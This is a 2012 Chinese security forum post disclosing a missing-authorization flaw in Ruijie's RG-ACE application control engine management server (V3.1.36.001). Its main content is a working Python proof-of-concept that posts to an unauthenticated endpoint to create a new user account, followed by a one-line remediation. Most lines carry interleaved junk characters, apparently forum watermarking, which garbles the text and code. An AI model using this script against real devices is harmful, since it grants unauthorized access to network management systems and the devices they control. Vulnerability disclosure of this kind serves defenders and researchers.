找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1914|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
( h2 Q) b- L2 x8 z- l" N& e$ [( o4 s) u: H0 n: ?
: r* |0 {6 C9 G- e5 S6 h6 s- Y
测试的具体版本是) D1 G+ h7 n! @7 v. I) g
产品名称: 锐捷应用控制引擎( S% _4 Y5 E. ]9 S
版本号: 3.1.36.001 TC
/ u! y5 a. H# d( N) P4 A编译时间: 201104291730
1 @# R  ~- N& x2 K) ^4 E; r2 ` ( K  ?" g2 N1 ?/ C. b$ ?

9 D: J1 @5 x, ~$ ]0 x& h漏洞证明:
  {( u' r6 x0 [, e$ t0 O. C
$ {# @/ m# K* R
& r- E1 ?5 x2 h) P
1 U5 c% L& D+ Y' K) _3 X5 ^' D0 B9 T
7 G, B# H% a* H; C* p

( R9 Y8 }9 \2 w执行脚本- |$ J3 n, g2 z, F( W
#! /usr/bin/env python. k8 X5 g: y3 p
#coding=gbk
" p4 Q# U9 I8 j5 C4 X#RG-ACE管理服务器 V3.1.36.001# q& j, ~! l" r+ \: v
import urllib2, urllib,cookielib
" f5 b3 G% F$ [: qurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
* O2 D9 c* h5 |, }  Q+ I1 s. i% r9 Topener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))- ^) z) B. o; S
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]2 Y" `6 w/ y! @5 r  a
post=(("event","userManager.doInsertUserInfo"),
1 c/ k! I, M8 s("useractionname","addButtonValue"),
4 s7 A; f- Y" U6 |("useropermanager","userManager"),5 t* d! b9 c# |# E
("userName","t"), #######账号自己加
4 d/ g: Q) m8 y+ F$ x' c$ k: `("pwd","aaaaaa"),######密码自己加
) S0 Q, K% D/ ]/ [' p6 N# S/ T("trueName","ad"),
) D' J$ K' k  G" G2 C("email","")," B- u) N9 H+ R9 Q
("mobilePhone",""),$ x. q+ O' z! @% Q
("officePhone",""),
+ r- `0 g! i/ o/ z1 {3 y7 y("addr",""),2 k! q2 `& |: _# b
("submit","确定"))+ V9 K6 e* t- _% k
urllib2.install_opener(opener)
9 C8 Q  O% S* i( |. V6 N' \7 yp=urllib2.urlopen(url, urllib.urlencode(post)).read()
1 \1 L+ f8 d+ Z/ G$ _print "Done"7 o% ^0 a1 m9 O6 Y5 J8 c
& H; e# t* ~4 K* @" J* T' j* A
登录,连接设备
4 O9 E3 g+ R6 g0 ~( C/ L
0 {, T( @5 y3 _& [& V  U
, y# o6 Z9 n* w. {3 j7 Q
1 b& ?8 B7 F* R  G$ y) _1 W" v7 G0 `* o2 |* j5 [  n2 g4 M

7 B/ L2 S( i0 i& T  |0 Y8 y1 S6 O2 z默认的管理员admin权限更大点' |  M  l( d& D, h# j' }7 |  I; F+ G2 V
1 a) ?! B* f! _9 c4 u  ]
$ W$ F+ ?0 G6 G7 T9 p& v# Z$ h$ D
$ \( ^- R* N6 G: }; {  D* m# c

! ~# d- l- m: }" f8 R# E! n6 {4 _( j( d$ m9 G$ u! X# N! B
修复方案:
( ~9 n" z) q; e- A. x. _加强对接口的权限验证9 c* T- K8 X3 c& C
. h5 r5 L. a3 M9 Y# w. r7 A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表